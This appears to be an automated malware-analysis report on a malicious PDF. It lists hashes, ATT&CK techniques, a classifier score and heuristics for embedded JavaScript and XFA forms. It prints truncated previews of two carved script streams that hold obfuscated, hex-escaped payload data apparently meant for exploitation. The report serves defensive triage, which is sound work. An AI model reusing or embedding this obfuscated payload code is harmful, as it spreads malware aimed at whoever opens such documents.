Malicious PDF — malware analysis report

Static analysis result for SHA-256 fcd2aa17ddded2ba…

MALICIOUS

PDF

7.3 KB First seen: 2021-06-04
MD5: 0706b966bb3482b91c781092c6f2cb94 SHA-1: 74882b928a39b4c827b92560d02e94d260a436cc SHA-256: fcd2aa17ddded2baf0954b3b799f5a05b15217803353c1d93192901046ce089d
76 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment

The sample is a PDF file flagged as malicious by an ML classifier. It contains embedded JavaScript, which is heavily obfuscated and uses hex escape sequences. The JavaScript likely attempts to download and execute a secondary payload, a common technique for malware delivery. While the embedded URLs are benign, the presence of obfuscated JavaScript and the ML classification strongly indicate malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xdp/ Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_000.js pdf-javascript-stream PDF /JS object 13 at offset 0x3A4 5628 bytes
SHA-256: 790a4e2f504a5b003a0660948f7c4fd6f7d4988c71c21421a9d621874f2c0d54
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long hex-escaped blob(s).
Preview script
First 1,000 lines of the extracted script
var _0x601a=["\x25\x75\x34\x31\x34\x31\x25\x75\x34\x31\x34\x31\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x30\x30\x25\x75\x34\x61\x38\x61\x25\x75\x32\x31\x39\x36\x25\x75\x34\x61\x38\x30\x25\x75\x31\x66\x39\x30\x25\x75\x34\x61\x38\x30\x25\x75\x39\x30\x33\x63\x25\x75\x34\x61\x38\x34\x25\x75\x62\x36\x39\x32\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x32\x32\x63\x38\x25\x75\x34\x61\x38\x35\x25\x75\x30\x30\x30\x30\x25\x75\x31\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x32\x25\x75\x30\x30\x30\x30\x25\x75\x30\x31\x30\x32\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x32\x64\x62\x32\x25\x75\x34\x61\x38\x34\x25\x75\x32\x61\x62\x31\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x30\x38\x25\x75\x30\x30\x30\x30\x25\x75\x61\x38\x61\x36\x25\x75\x34\x61\x38\x30\x25\x75\x31\x66\x39\x30\x25\x75\x34\x61\x38\x30\x25\x75\x39\x30\x33\x38\x25\x75\x34\x61\x38\x34\x25\x75\x62\x36\x39\x32\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x66\x66\x66\x66\x25\x75\x66\x66\x66\x66\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x34\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x31\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x32\x64\x62\x32\x25\x75\x34\x61\x38\x34\x25\x75\x32\x61\x62\x31\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x30\x38\x25\x75\x30\x30\x30\x30\x25\x75\x61\x38\x61\x36\x25\x75\x34\x61\x38\x30\x25\x75\x31\x66\x39\x30\x25\x75\x34\x61\x38\x30\x25\x75\x39\x30\x33\x30\x25\x75\x34\x61\x38\x34\x25\x75\x62\x36\x39\x32\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x66\x66\x66\x66\x25\x75\x66\x66\x66\x66\x25\x75\x30\x30\x32\x32\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x31\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x30\x34\x25\x75\x34\x61\x38\x61\x25\x75\x32\x31\x39\x36\x25\x75\x34\x61\x38\x30\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x32\x64\x62\x32\x25\x75\x34\x61\x38\x34\x25\x75\x32\x61\x62\x31\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x33\x30\x25\x75\x30\x30\x30\x30\x25\x75\x61\x38\x61\x36\x25\x75\x34\x61\x38\x30\x25\x75\x31\x66\x39\x30\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x30\x34\x25\x75\x34\x61\x38\x61\x25\x75\x61\x37\x64\x38\x25\x75\x34\x61\x38\x30\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x32\x64\x62\x32\x25\x75\x34\x61\x38\x34\x25\x75\x32\x61\x62\x31\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x32\x30\x25\x75\x30\x30\x30\x30\x25\x75\x61\x38\x61\x36\x25\x75\x34\x61\x38\x30\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x61\x65\x64\x63\x25\x75\x34\x61\x38\x30\x25\x75\x31\x66\x39\x30\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x33\x34\x25\x75\x30\x30\x30\x30\x25\x75\x64\x35\x38\x35\x25\x75\x34\x61\x38\x30\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x32\x64\x62\x32\x25\x75\x34\x61\x38\x34\x25\x75\x32\x61\x62\x31\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x30\x61\x25\x75\x30\x30\x30\x30\x25\x75\x61\x38\x61\x36\x25\x75\x34\x61\x38\x30\x25\x75\x31\x66\x39\x30\x25\x75\x34\x61\x38\x30\x25\x75\x39\x31\x37\x30\x25\x75\x34\x61\x38\x34\x25\x75\x62\x36\x39\x32\x25\x75\x34\x61\x38\x30\x25\x75\x66\x66\x66\x66\x25\x75\x66\x66\x66\x66\x25\x75\x66\x66\x66\x66\x25\x75\x66\x66\x66\x66\x25\x75\x66\x66\x66\x66\x25\x75\x66\x66\x66\x66\x25\x75\x31\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x63\x32\x64\x62\x25\x75\x37\x34\x64\x39\x25\x75\x66\x34\x32\x34\x25\x75\x62\x61\x35\x38\

... (truncated)
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x3C7 6472 bytes
SHA-256: 52066f531089888a92fa67f5907b716680814d04e06eeedafa0ae1501bcdb601
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long hex-escaped blob(s).
Preview script
First 1,000 lines of the extracted script
var _0x601a=["\x25\x75\x34\x31\x34\x31\x25\x75\x34\x31\x34\x31\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x30\x30\x25\x75\x34\x61\x38\x61\x25\x75\x32\x31\x39\x36\x25\x75\x34\x61\x38\x30\x25\x75\x31\x66\x39\x30\x25\x75\x34\x61\x38\x30\x25\x75\x39\x30\x33\x63\x25\x75\x34\x61\x38\x34\x25\x75\x62\x36\x39\x32\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x32\x32\x63\x38\x25\x75\x34\x61\x38\x35\x25\x75\x30\x30\x30\x30\x25\x75\x31\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x32\x25\x75\x30\x30\x30\x30\x25\x75\x30\x31\x30\x32\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x32\x64\x62\x32\x25\x75\x34\x61\x38\x34\x25\x75\x32\x61\x62\x31\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x30\x38\x25\x75\x30\x30\x30\x30\x25\x75\x61\x38\x61\x36\x25\x75\x34\x61\x38\x30\x25\x75\x31\x66\x39\x30\x25\x75\x34\x61\x38\x30\x25\x75\x39\x30\x33\x38\x25\x75\x34\x61\x38\x34\x25\x75\x62\x36\x39\x32\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x66\x66\x66\x66\x25\x75\x66\x66\x66\x66\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x34\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x31\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x32\x64\x62\x32\x25\x75\x34\x61\x38\x34\x25\x75\x32\x61\x62\x31\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x30\x38\x25\x75\x30\x30\x30\x30\x25\x75\x61\x38\x61\x36\x25\x75\x34\x61\x38\x30\x25\x75\x31\x66\x39\x30\x25\x75\x34\x61\x38\x30\x25\x75\x39\x30\x33\x30\x25\x75\x34\x61\x38\x34\x25\x75\x62\x36\x39\x32\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x66\x66\x66\x66\x25\x75\x66\x66\x66\x66\x25\x75\x30\x30\x32\x32\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x31\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x30\x34\x25\x75\x34\x61\x38\x61\x25\x75\x32\x31\x39\x36\x25\x75\x34\x61\x38\x30\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x32\x64\x62\x32\x25\x75\x34\x61\x38\x34\x25\x75\x32\x61\x62\x31\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x33\x30\x25\x75\x30\x30\x30\x30\x25\x75\x61\x38\x61\x36\x25\x75\x34\x61\x38\x30\x25\x75\x31\x66\x39\x30\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x30\x34\x25\x75\x34\x61\x38\x61\x25\x75\x61\x37\x64\x38\x25\x75\x34\x61\x38\x30\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x32\x64\x62\x32\x25\x75\x34\x61\x38\x34\x25\x75\x32\x61\x62\x31\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x32\x30\x25\x75\x30\x30\x30\x30\x25\x75\x61\x38\x61\x36\x25\x75\x34\x61\x38\x30\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x61\x65\x64\x63\x25\x75\x34\x61\x38\x30\x25\x75\x31\x66\x39\x30\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x33\x34\x25\x75\x30\x30\x30\x30\x25\x75\x64\x35\x38\x35\x25\x75\x34\x61\x38\x30\x25\x75\x36\x33\x61\x35\x25\x75\x34\x61\x38\x30\x25\x75\x31\x30\x36\x34\x25\x75\x34\x61\x38\x30\x25\x75\x32\x64\x62\x32\x25\x75\x34\x61\x38\x34\x25\x75\x32\x61\x62\x31\x25\x75\x34\x61\x38\x30\x25\x75\x30\x30\x30\x61\x25\x75\x30\x30\x30\x30\x25\x75\x61\x38\x61\x36\x25\x75\x34\x61\x38\x30\x25\x75\x31\x66\x39\x30\x25\x75\x34\x61\x38\x30\x25\x75\x39\x31\x37\x30\x25\x75\x34\x61\x38\x34\x25\x75\x62\x36\x39\x32\x25\x75\x34\x61\x38\x30\x25\x75\x66\x66\x66\x66\x25\x75\x66\x66\x66\x66\x25\x75\x66\x66\x66\x66\x25\x75\x66\x66\x66\x66\x25\x75\x66\x66\x66\x66\x25\x75\x66\x66\x66\x66\x25\x75\x31\x30\x30\x30\x25\x75\x30\x30\x30\x30\x25\x75\x63\x32\x64\x62\x25\x75\x37\x34\x64\x39\x25\x75\x66\x34\x32\x34\x25\x75\x62\x61\x35\x38\

... (truncated)